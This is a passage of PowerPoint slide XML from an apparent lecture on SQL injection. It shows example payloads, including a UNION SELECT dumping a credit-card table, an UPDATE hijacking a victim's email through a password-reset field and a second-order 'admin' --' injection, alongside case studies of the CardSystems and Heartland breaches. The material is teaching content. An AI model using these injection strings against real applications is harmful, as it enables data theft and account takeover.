              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Reset password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’; UPDATE USERS SET email=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hcker@root.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE email=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim@yahoo.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322265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DCEA1F3-90B8-A141-BE90-1A2CFC4BE2DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Can Pull Data From Other Tables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DC8C14A-FE62-D34C-8E42-1736A08ECFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="8023412" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>User gives username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND 1=0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT cardholder, number, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exp_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exp_year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>creditcards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Results of two queries are combined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Empty table from the first query is displayed together with the entire contents of the credit card database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182894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6" name="Rectangle 75">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57346" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A21B13E-ED31-C64B-86DE-991CEB1B779B}"/>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rPr>
              <a:t>Second-Order SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BFC385E-9414-6A46-B3E8-39C9D346B278}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654293" y="559477"/>
            <a:ext cx="6861467" cy="5832179"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Data stored in the database can be later used to conduct SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>For example, user manages to set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> to admin’ --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>This vulnerability could exist if input validation and escaping are applied inconsistently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Some Web applications only validate inputs coming from the Web server but not inputs coming from the back-end DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>UPDATE USERS SET passwd=‘cracked’ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=‘admin’ --’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Must treat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> parameters as dangerous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6E67EF1-D59D-1744-AFB6-72BE6CE6ED4D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4986000" y="5875453"/>
              <a:ext cx="5747400" cy="120600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6E67EF1-D59D-1744-AFB6-72BE6CE6ED4D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4896000" y="5695453"/>
                <a:ext cx="5927040" cy="480240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282857377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21E6093-DBBA-F24D-B1D5-15934324C740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>CardSystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> Solutions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9332A35E-E20C-A949-963A-D4839EA2203F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="6180161" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Major credit card processing company put out of business by a SQL injection attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Credit card numbers stored unencrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Data on 263,000 accounts stolen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>43 million identities exposed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="Pay By Touch: CardSystems Solutions Settles with FTC">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B95C7C-BAE7-524A-97E6-C0E484F0C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642594"/>
            <a:ext cx="4724400" cy="132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62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knife&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08778C22-6BB2-E24B-BDC1-A8C9A198F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23" y="576397"/>
            <a:ext cx="6527800" cy="1689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="508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A61F068E-50D6-AB4B-AA8F-F7425B671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437" y="2209800"/>
            <a:ext cx="8146378" cy="3713544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>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BE152B1C-B652-1341-B399-6BCEAEF25098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425083" y="6168023"/>
            <a:ext cx="11969087" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>www.nytimes.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/2014/08/06/technology/russian-gang-said-to-amass-more-than-a-billion-stolen-internet-credentials.html</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40B5383-A4C6-EA43-B67F-2D4CF6895A97}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4286724" y="3703933"/>
              <a:ext cx="5771520" cy="77760"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{640B5383-A4C6-EA43-B67F-2D4CF6895A97}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4197084" y="3523933"/>
                <a:ext cx="59511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55B0676-56B4-7D40-8FDA-4BC2CC19D702}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2698044" y="4010293"/>
              <a:ext cx="7382160" cy="186480"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{055B0676-56B4-7D40-8FDA-4BC2CC19D702}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId8"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2608404" y="3830653"/>
                <a:ext cx="756180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7DF3627-E2AA-054C-A438-F463C77346E0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2722164" y="4360213"/>
              <a:ext cx="6521400" cy="140040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Ink 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7DF3627-E2AA-054C-A438-F463C77346E0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId10"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2632524" y="4180213"/>
                <a:ext cx="6701040" cy="499680"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113211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Heartland's New Breach - BankInfoSecurity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C877BD7B-1904-9C40-9C1E-945C4A7A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105" y="512923"/>
            <a:ext cx="3694176" cy="2234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536F21-ABEE-3743-A6A3-A8344460A623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4693694" y="952950"/>
            <a:ext cx="5638799" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Major credit card processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>130 million card numbers stolen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9A2362F-F5D9-BF4A-AA59-3DD44D46D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05" y="3053757"/>
            <a:ext cx="9853366" cy="1316112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69100496-6E71-D94E-A4AA-F176F93758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664" y="4673123"/>
            <a:ext cx="1310186" cy="1520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626AEA-DB99-994D-BA97-BD3EF7A2F7DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8638249" y="4673123"/>
            <a:ext cx="2930610" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Albert Gonzales (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>soupnazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>20 years federal sentence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12E63D92-229C-A74D-BC3D-78F3DA875FAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8998764" y="3525580"/>
            <a:ext cx="451440" cy="653040"/>
            <a:chOff x="8998764" y="3307213"/>
            <a:chExt cx="451440" cy="65304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2B887915-93CA-BB4F-8BA3-A3E3D10B5013}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9079404" y="3329893"/>
                <a:ext cx="370800" cy="630360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="4" name="Ink 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B887915-93CA-BB4F-8BA3-A3E3D10B5013}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9043764" y="3293893"/>
                  <a:ext cx="44244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7C1E210C-AF80-1E41-87FF-8401DFCE6126}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8998764" y="3324133"/>
                <a:ext cx="46440" cy="169200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="5" name="Ink 4">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C1E210C-AF80-1E41-87FF-8401DFCE6126}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8962764" y="3288133"/>
                  <a:ext cx="118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2F89512C-699F-B546-AE51-FB6B2209E2A4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9098844" y="3307213"/>
                <a:ext cx="217080" cy="45720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F89512C-699F-B546-AE51-FB6B2209E2A4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9062844" y="3271573"/>
                  <a:ext cx="288720" cy="117360"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DCB9226-A08C-2E48-AB1E-6BAE950D4DB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1965278" y="4872251"/>
            <a:ext cx="5145987" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also responsible for TJX and Dave &amp; Buster’s hacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used SQL injection to introduce packet sniffing code to grab card numbers off of internal networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3918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romotional image for social media site Gab says ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
